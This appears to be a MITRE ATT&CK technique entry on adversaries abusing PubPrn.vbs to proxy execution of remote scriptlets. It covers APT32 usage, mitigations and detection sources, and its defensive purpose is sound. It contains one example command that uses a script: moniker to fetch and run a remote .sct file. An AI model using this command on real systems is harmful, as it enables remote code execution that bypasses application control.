Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe
. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com
.[1]
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.[2] To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
ID | Name | Description |
---|---|---|
G0050 | APT32 |
APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.[3] |
ID | Mitigation | Description |
---|---|---|
M1040 | Behavior Prevention on Endpoint |
On Windows 10, update Windows Defender Application Control policies to include rules that block the older, vulnerable versions of PubPrn.[4] |
M1038 | Execution Prevention |
Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries. |
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0009 | Process | Process Creation |
DS0012 | Script | Script Execution |
Monitor script processes, such as cscript
, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.